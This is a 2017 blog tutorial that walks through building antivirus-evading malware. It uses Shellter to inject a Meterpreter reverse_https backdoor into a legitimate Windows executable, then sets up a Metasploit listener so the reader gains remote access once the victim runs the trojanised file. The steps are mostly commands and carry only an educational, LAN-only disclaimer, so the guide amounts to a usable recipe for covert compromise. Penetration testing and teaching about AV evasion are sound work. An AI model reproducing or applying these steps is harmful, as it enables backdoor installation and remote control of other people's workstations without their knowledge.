Ready to Start Your Career?
March 23, 2017
Tutorial: Avoid Antiviruses and Compromise Workstations - Part 1
March 23, 2017
It's 2017 and traditional Antivirus solutions are becoming more and more obsolete with every passing day. The rise of exploit kits and "do it yourself malware" means that organizations can no longer rely solely on Antivirus solutions to keep them safe. In fact, someone with little experience can now make a unique piece of malware that is capable of evading the majority, if not all traditional Antivirus solutions.This is a guide aimed at all skill levels, from students to professional penetration testers, and aims to show how anyone can create their own unique piece of Malware (capable of evading AV) that gives them remote access to a machine by using Metasploit, and Shellter.Disclaimer: This guide is for educational purposes only, and can be used on a Local Area Network (LAN) to demonstrate how easily a workstation can be compromised without an organization being aware. This guide is limited to a LAN and does not detail how to set up port forwarding from public IP's to Private IP's, command and control servers, or how to configure firewalls. This is largely unnecessary for isolated demonstrations; however, if enough interest is shown I may add this to another guide. No warranty is provided on the accuracy of this guide and it is provided strictly as is. I will not go into what all of the commands are performing in this particular tutorial, but depending on the community response I will look to explain it more in depth in another post.Meterpreter and ShellterCreating the backdoor
- Elevate to root and download Shellter - Open a terminal and type:sudo suapt-get install shellter
- Find a 32 bit executable vulnerable to PE Injection (the uninstall files found after installing a program work well). Copy this to your Kali Desktop.
- Change directory and run Shellter – in the same terminal type:cd Desktop shellter &
- Under Operation mode select automatic and choose your executable target – type:a<Filename of Vulnerable 32 bit executable>
- The program will attempt to find an entry point for the backdoor, if the program throws errors and fails, find a different executable to use.
- Under Enable Stealth mode – type:Y to attempt to preserve original .exe functionality (Not recommended if you used an uninstall executable)ORN to strip the programs original functionality and just run as a backdoor.
- Under Payloads – type:L followed by a number to use a native Meterpreter BackdoorORC to use a custom script
- Find out your local IP Address – Open your existing terminal and type:Ifconfig
- Note your local IP address i.e. 192.168.218.128 (denoted next to ‘inet’)
- Set the destination IP for the payload – Return to Shellter and type:<Local IP Address><Local Port to run on i.e. 8080>
- You will see Injection: Verified!
- Run the Metasploit framework - Open your existing terminal and type:msfconsole
- Run the Metasploit handler – type:use exploit/multi/handler
- Set up your handler with the related exploit set on your backdoor – e.g. type:set payload windows/meterpreter/reverse_httpsset lport <local port to run on i.e. 8080> set lhost <Local IP Address>
- Run your listener and handler – type:exploit
- This will now create your meterpreter console. Ensure your victim machine is on the same network as you and is within the same broadcast range. Run the infected executable on the victim machine.